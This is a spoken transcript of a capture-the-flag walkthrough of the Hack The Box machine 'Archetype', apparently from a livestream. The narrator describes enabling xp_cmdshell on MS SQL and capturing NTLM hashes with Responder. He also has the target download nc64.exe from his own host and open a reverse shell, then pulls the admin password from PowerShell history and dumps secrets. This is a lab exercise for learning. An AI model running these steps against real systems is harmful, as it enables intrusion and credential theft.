Welcome back. So we are on tier 2 now on Archetype, or Archetype, whatever you want to call it. Okay, let's go and start off with the Rust scan as usual. Oh man, we got so much stuff open. Oh god. I did a horrible job of getting this video ready. There we go. Start off with the Rust scan here. Looks like we have an MS SQL server up and running. So that's good for us, right? We can always try to do like a command prompt on it or some of that. Like execute command shell or something. And it looks like we also have 5985 WinRM, 445 SMB, 139 SMB, and then MSRPC on it. So that's some good stuff for us, right? Let's try to go ahead and do an SMB client like real quick. See if we can grab some usernames, something like that. You never know. If it's open. If we have null access. Alright, we do. We actually have null access to backup. I should probably also read the questions, huh? That would probably be the best idea. Let's go ahead and do that like real quick. Let's go ahead and read these questions, see what we're supposed to do here. Which TCP port is hosted database server? That would be 1433. That's MS SQL. Default port for it. Was the non-administrative share over the SMB? I believe it was backups, right? That's what we just got into. Let's go ahead and hop back over into this thing. See what we got going on here. DIR. We are on Windows Link right now. We got this prod DTS config. Let's go ahead and get that. Exit up here. Let's go ahead and, I guess let's try grep it first for like password, some of that, like username, password, something. Make my life easier. All right, we got a password. Fuck yeah, and a username SQL service with a password of megacore123. That semicolon looks like it's used to separate the different things, like right there. So it's this SQL service, most like MS SQL, right? We can check that with NXC. Let's see if it logs in. We also check that with oh, I should probably give it an IP address, huh? It's not that smart, is it? Oh no, this is disturbed. That's what I'm talking about. We got whatever YouTube channel I'm on like right now. New metal. That's what I'm on. New metal. This is new metal, huh? Okay. Looks like I actually had a little bit of a problem here. Let's do it. Try that again. Might have to do a Windows auth also, because it might be like a local user. So it might not be like, it's obviously not a domain user because we're not a domain. So we might have to do like tech local auth. We'll just say, hey, local authentication for it. We can also use crack everything for this script I made a while ago. Tech U. Oh, it still looks like it didn't even log in. I don't believe it. Let's try to log into it. MSSQL client.py. I don't believe it. And then we'll do, I don't know what the slash, let's see here, because I think it needs a domain name, right? Yeah, we'll say slash SQL service. That password. Well, that's not a password, is it? That won't work. Let's go ahead and scroll up. This megacore. Yeah, it's definitely SQL SVC. There we go. At the IP address, right? So now we just got to do it at that IP address that we have for this guy. Let's go and try that, like right there. I don't believe it. Oh, really? What's the domain name I want? XCSMB. That guy like right there. Tech U MSSQ or SQL service. Let's go and see if this guy can log in anywhere. I should have used crack everything for that, but that's okay. Crack everything. SQL. No, he can't log in anywhere, huh? Well, I also gave it the IP address for my password, so that's obviously not going to work also. I just stopped watching now. I would go ahead and just watch another streamer. Go ahead and log off and watch someone else. Go ahead and try that, like right there. Ben like that one. Ben's probably like, yeah, this dude sucks. Yeah, I feel the same way. Let's put in IP addresses as password and stuff. That don't work. Did this guy do anything? Alright, so this guy can't do shit. So he sucks. But was the password identified? Damn it. I still have the IP address. I'm failing. Alright, let's go ahead and grab this like right here. I think that's it. That's what it seemed like. I don't think there's a semicolon at the end there. Okay, that is it. What script for impact can we use? MS-SQL client.py. What extended store C can be used in order to spawn a Windows command shell, XP command shell. We're just going to go through this without actually going through it. What script can be used in order to search possible paths to escalate privileges on Windows hosts? Shit. See, now it's getting to the hard stuff. All right, because I'm not seeing anything in here that's allowing me to actually run for MS-SQL client, which is really, really strange because, you know, we have an SQL service password. It states that we're going to be attacking SQL client. So, okay, I have another idea. Let's try this. Let's try it with Archetype. Oh, some corn playing now? Nothing. Really? I just spelled that right, correct? Let's try with Windows auth, maybe with, is it just tac Windows auth or tac Windows auth? Tac Windows auth, okay. There we go, ayo! Yeah, I know. That's how I feel like right now. Pressure's up. There we go, Windows auth. It just takes a minute, you know, now it just takes longer for it to travel from my brain to my fingers, that's all. That's the problem, like, right now. Like, I just have to, you know, open my eyes like, oh, crap. Shake my head, like, a little bit. Alright. We're in. So, MS-SQL client makes it a lot easier to run commands on here. Right? But we can try to do, like, an XP command shell. And we can try to do something like this and say, like, who am I? And if this works, our life is good. Oh, it's turned off. That's okay. Because we can try to turn it on also. Let's go and try to turn it on. MS-SQL. We can turn this on. So let me go ahead and look at my notes like real quick. We're going to try to turn this on. Let me go ahead and look up XP command shell. See if that's in here anywhere. Check if XP command shell is enabled. And then if it's not, run this. Boom. Good thing someone took notes. Oh, this enables. Alright, so what we did, okay, we did SP configure show advanced options 1. That's going to turn the advanced options on, right? Then we have to reconfigure it, okay? From there, we're going to go ahead and SP configure XP command shell 1 because that will turn it on. Then we reconfigure it. Now we should be able to do an XP command shell. Who am I? And then there we go. Now you can only do that if you have the permissions to do it. So now we're running commands on the actual system itself, right? Something else we could do is we could do a sudo responder, right? And what we could do here is we can actually call for an XP directory, and then we call back to ourselves, all right? Which this is our IP address right here. So we can say // that guy / bunch of crap. We don't care what it actually says afterwards. And we should be able to receive the NTLM. There we go. Now NTLM hash for that user. So let's say we don't, you know, let's say we get into it somehow, or let's say we're a different user, right? Like we're SA. We try to log into SQL service. We got in, and then we became SA user or some different user or some of that. We can send that back to ourselves and then try to crack this net NTLM hash. Now, if we have a word list that goes along with it, we might be able to crack it, right? Now, how do we get to a different user, though? We can execute as login. Okay, so we can impersonate user. So let's go ahead and enum impersonate first and see, is there anyone in here that we can even impersonate? All right, DC admin, we can impersonate someone. All right, it's right there. So let's go ahead and execute as login DC admin. All right, it's saying, nope, you can't do that. It does not exist, right? So who the hell is that? Let's try SA, which is the default user for MS SQL client, for MS SQL, right? Now we can do that same command that we ran before and see, can we get the SA's password? Or is that LTM hash, right? It may actually need to put in like share or something like that. Let's try that. And see if it actually calls back to us. And it does, but it's calling back to us as SQL service, so that's not really going to help us out very much, right? But you can actually enumerate different users and impersonate those users utilizing MS SQL client.py, okay? But our next question, which I forgot what the hell it was already, because I'm that type of person. And let's go ahead and take a look at it. If I click on the right thing here. Oh, God. All right. What script can be used in order to search possible paths to escalate privileges? Oh, one piece. Is that what it's talking about? Yeah, it is. It's talking about one piece. Okay. So we cannot run WinPiece straight from this MS SQL client. What we need to do is we need to get a reverse shell going, right? So let's go ahead and let's try to get a reverse shell. We can try to use PowerShell or something like that. Let's go ahead and XP command shell. And what I want to try to do is I'm going to say PowerShell -c. Then I want to give it like, this is all my scripts folder. Actually, this one's actually my tools folder, like right here. Invoke PowerShell, which this is a niching PowerShell one-liner. So, one line.ps1. Okay, so we go ahead and grab this guy right here. All right, this is on niching stuff on GitHub. All right, and what the problem is now is these slashes are going to fuck us all up, aren't they? I wonder if we're already running actually as PowerShell, because that'd be sweet if we're already in PowerShell. Sometimes you're in command prompt, sometimes you're in PowerShell, and sometimes you just exit out of it like an asshole. Okay? So, all depends on what you're doing. I wonder if it's still... It should still work just fine. Yep. And I exit out of it again because I suck at what I'm doing. God, golly. 10, 10, 14, 55, right? Sometimes you just continue to exit out of it. Can't hack it if it doesn't work. Let's go ahead and grab this like right here. Let's try and get a reverse shell going. And if this one doesn't work, I do have another way to be able to... Well, obviously. We have 1,000 ways to be able to do this, right? So we're going to try an XP command shell, and we'll do that number like right there. Boom, boom. We'll give it that, and then we'll do an RL wrap, and we'll listen out port 445, which remember, put our IP address right here on port 445. Let's go ahead and try that like real quick. Okay, it hates us, right? It's like, no, you can't do that, right? That's okay, because what else we could do is we can go ahead and XP command shell. We're going to say make directory c temp. Right? Cool. Now we're going to go ahead and we're going to do a wget. Actually, we'll do a PowerShell text C, which means run command of PowerShell wget HTB 10.10.14.55 / nc64.exe tech o c temp nc64.exe, and we're just hoping that this is actually a 64-bit system because we're in 2023. If it's a 32-bit system, then we have problems. So let's go ahead and cd into tools, and we'll do that. Okay, so it hates us with PowerShell taxi. I wonder if we can actually just get rid of that, like right there. I wonder if it's already running as PowerShell. Okay, wget is not, so we can't go to that. That's okay, because we have another way to be able to do this. We can download from command prompt, right? Because Windows is stupid. They allow you to do everything. You just got to work around it. So we'll go to download from command prompt. Boom, boom. Okay, let's go ahead and try this. XP command shell. Whoop, whoop. And we're looking at 10.10. 1455, right? We're looking at nc64.exe. We're trying to put that in ctemp nc64.exe. Let's go ahead and see if it downloads from over here. Let's go. We get 200. Yes, Ben. My old notes are on Cherry Tree. My new notes are on Obsidian. I've been gradually moving them over, but I just keep both of them. All right, so we do get that 200, so we know that it did download, right? So now if we do we can ensure that, so we can do a dir on ctemp. And we do see that nc64.exe like right there. Easy freaking day, right? So let's go ahead and do a ctemp nc64.exe, right? 10, 10, 14, 55. Port 445, TACI command prompt. The reason I like to use port 445 is because I know that can talk back to me, right? RL wrap on port 445 there. Boom, and we do get our reverse shell. Let's frickin' go. Okay, so now we have a full shell on this guy, right? So, easy day. Who am I? /all. And it looks like we actually have a impersonate client authentication, so we could 100% use something like juicy potato ng or something like that, right? Whoop, whoop. That's right, Ben. All right. I don't even know what the question is. What's the question? What file contains the administrator's password? But we're actually looking for a file that contains the administrator's password. So let's go ahead and let's search for all text files, okay? So we can go ahead and we can look at my notes here. And I think I have something called finding passwords within my Windows notes here. We got to drop off a Bloodhound here. Boom. Finding processes, history, finding passwords. There we go. So we're going to look at C users. We're going to look for, let me go ahead and copy it over here so you can see a little bit better. We're going to do a get child item. This is actually in PowerShell. So we're actually going to go to PowerShell first. So we'll do a PowerShell. All right. We're going to do a get child item, tag path C users. We're going to start off as C users because usually if someone has something, it's usually on a desktop or documents or downloads or something like that. It's in that C users area, right? But we're going to include anything that starts with something that ends with .text, .ini, or .xml, right? We're going to recurse that, so it's going to look through all different users that we can. And then I don't want to see the errors. I don't care. I know there's going to be places that I can't see. I don't care. The only thing we're seeing like right now is user.txt. That's it. So let's go ahead and try it in the C drive, which if you're like an administrator, you're going to get a lot of crap here, just so you know. And even if we're not an administrator, we're going to get a lot of crap here. So we got a bunch of stuff we don't care that much about, right? But let's see here. Let's think of other ways to be able to do this, right? We found that text file. What about, if we're in PowerShell, what about our PowerShell history, right? So we also want to look at the history of PowerShell to see if maybe someone has ever upgraded to administrator from the SQL service, because that is a service account. So maybe the administrator logged in with it and then logged back to their own account and it's stuck still in that PowerShell history. So we may be able to look at something like that, right? So I'm going to look for my PowerShell history folder. If I can find it. What if I could just do history? Might be a little bit easier to search for that. There we go. PowerShell history, right? First thing we want to do is we want to see where's the history held at. Usually it's held in the same place on a lot of systems, but we want to make sure of that, right? Next thing we want to do is, oh my God, that was a horrible idea to actually do that on the C drive. Don't ever do that on C drive. So there you go. I am trash. All right, that's what you do during that time, okay, is you just exit out of it. Exit out of there. And we just rerun what we did, right? Actually, I probably just copy and paste it, huh? There we go. Okay. Thank God. All right, let's go ahead and grab that PowerShell history, and we'll see like where this user's history is, okay? So we're going to go back into PowerShell. Okay, so it looks like, oh wow, that was actually super easy. It just we did a cat PS read line. I actually grabbed the wrong thing. Get PS read line will show us like where the history's at. That cat will actually try to read the history. But this shows like where the history's at. That's usually like where it is with Microsoft roaming, app data, roaming, Microsoft Windows, PowerShell, PS read line, console history.txt. But it can be in different locations. Okay, it can be in other places, right? But we do see it. This guy tried to do net.exe use on the T drive, so they probably have a share, some of that set up right, which we did already see a share, so that's most likely a share. And that is the backup share, actually, that we already saw. User administrator with this password, like right here. So we now have the admin's password. And what we're looking at is console history.txt, right? That's that text file that we found that has the guy's information in it. Submit the user flag and then submit the root flag, right? So let's go ahead and actually, I believe WinRM was up on this machine. Is that the machine? Nope, it's not. 208.39. Yep, WinRM's on. So let's go ahead and eval WinRM in. (2839) Tech U administrator. Tech P, that password that we found, right? Wherever that guy went. And we do have to put that in quotes because it has that exclamation point at the end of it, right? There we go. So cd /desktop. There we go. Type root.txt. There's the root password. Then we also need the user's password, right? So we'll go down here. We'll cd to c users. cd SQL service. Desktop. Type user.txt. And then there we go. So we got the user and also the root.txt passwords like right there. Or hashes, excuse me, for their flags. Now going a little bit above and beyond this, right? Since we are an administrator, we can go ahead and we can do a secrets dump on this thing. We can try that, right? Secrets dump.py. And this guy was, I don't remember the name of it actually. Archetype. Administrator. That looked really weird how I spelled administrator for some reason. Okay. We can come over here and we can do a quick grab of this. And we can also throw Mimikatz into here. We can do a lot of things, right? This is most likely all that's in there. It's just those two users, since that's what we saw whenever we did the see users. We also do like a net user and see who else is in here. But most likely just going to be just those two. Oh, never mind. It's already canceled out. I keep forgetting about that. But I'm not going to start it back up. That is Archetype. And yeah, the other videos will be coming out soon. I'm going to go ahead. I'm going to get off the stream here. I'm going to get off the stop this Archetype video like right here. And I'll talk to you all later.